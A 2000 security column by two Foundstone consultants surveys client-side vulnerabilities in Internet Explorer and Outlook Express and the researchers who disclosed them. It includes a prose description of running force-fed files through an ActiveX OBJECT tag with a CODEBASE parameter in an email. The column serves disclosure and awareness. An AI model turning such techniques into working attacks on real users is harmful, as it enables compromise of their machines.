SAN MATEO (07/17/2000) - Last week's column on the Life-Changes virus and Microsoft Corp. Windows scrap files got us thinking: Perhaps the quickest avenue to a mother lode of corporate data isn't through the front door. We've preached in this column more than a few times that Web (server) hacking is the bane of e-commerce, but recent events have made us take a serious look at the other end: Internet client software.
The growing number of vulnerabilities in client software creates a close runoff with the server side for most damaging technique of 2000. If you consider that everyone from the CEO to the Web development team is using this software for nearly 90 percent of their daily activities (namely e-mail reading and Web browsing), it might begin to dawn on you that this is indeed a serious issue.
The sheer distributed nature of the problem also makes it much harder to patch than its counterpart on the server side. Worried yet?
Frankly, we're surprised that the most well-publicized client hacks (Melissa and its variants, Worm.Explore.Zip, "I Love You," etc.) have been so mild.
Looking at some of the tools and techniques posted on the Internet, it's amazing that we haven't read any stories of more serious damage.
Take, for instance, the site of the man Microsoft surely loves to hate, Georgi Guninski (www.nat.bg/~joro). Based solely on the research he's posted on the Web, Georgi is arguably one of the world's foremost experts on Web browser and e-mail client hacking.
The litany of vulnerabilities on Georgi's Internet Explorer page is astounding, ranging from Java to ActiveX problems, cross-frame security to help-file issues, and in severity from reading local files to the capability to execute arbitrary code. To be honest, we've seen advisories announcing many of these vulnerabilities in the past but used to pooh-pooh them as "end-user problems."
After testing most of Georgi's proof-of-concept code, we're now believers. If anyone still thinks exploit code isn't a powerful motivator for fixing things, they should visit Georgi's page. He just released two new exploits that access local ActiveX objects and are capable of writing files to disk. Microsoft was working on patches at the time of our writing this column, but had not yet released them.
Another citizen sure to be high on Microsoft IE team's hit list is Juan Carlos Garca Cuartango. Juan Carlos' Web site, www.kriptopolis.com, is another great resource for client-side security information, if you happen to read Spanish.
There is an English version of the site's most recent addition, which concerns the Active Setup Download vulnerability. This is a nifty DoS (denial of service) attack that exploits an ActiveX control used for Active Setup to download signed Microsoft CAB files to any specified location on disk, even if that location overwrites another file. Microsoft has patched this one, at www.microsoft.com/security (Bulletin MS00-42).
There are plenty of other folks finding holes in the fabric of the client side of the Internet. The gang at Malware.com (that's for malicious software) recently created a stir when they posted an advisory about "force-feeding" files to IE and Outlook users, even when they expressly cancel the download process. In our testing, there are many variables that affect this outcome, and exploiting it via a malicious e-mail message (as opposed to a malicious Web page) is not trivial. Nevertheless, this is the beginning of a serious problem if files can be randomly written to disk without user authorization. Microsoft has not yet responded to this one.
Hacker extraordinaire Weld Pond (of L0pht and netcat NT fame) chimed in on behalf of his colleague Dildog (of Cult of the Dead Cow and Back Orifice 2000 fame) on the Bugtraq thread addressing the force-feeding. Weld et alia provided a mechanism for executing files force-fed to users via the Malware.com technique. By stuffing an ActiveX OBJECT tag with a nonzero CODEBASE parameter into the body of a malicious e-mail message, any file on disk can be executed.
Yikes. However, in our testing, we also found that several planets had to be in alignment for this to work. Primarily, on Outlook Express 5.00.2615.200, we had to set the security zone to Low, and we were still prompted with a dialog to execute an unsigned control when we tried to launch calc.exe in the system folder. Users would have to be pretty clueless to fall for this one, but it is another intriguing start, especially when taken together with the capability to write files to disk as supplied by Malware.com.
Let's not forget veterans such as Richard M. Smith (www.tiac.net/users/smiths) and the Princeton Secure Internet Programming Team (www.cs.princeton.edu/sip), who continue to make insightful forays into mobile code security. Even relative unknowns are pointing out holes: Andrew Nosenko posted an advisory on IE frame security issues (see Microsoft Security Bulletin MS00-033).
We could go on for four more columns on related client-side problems. Is your telescope starting to turn around, or are we just navel gazing? Let us know at firstname.lastname@example.org.
Stuart McClure is president and CTO and Joel Scambray is managing principal at security consultant Foundstone (www.foundstone.com).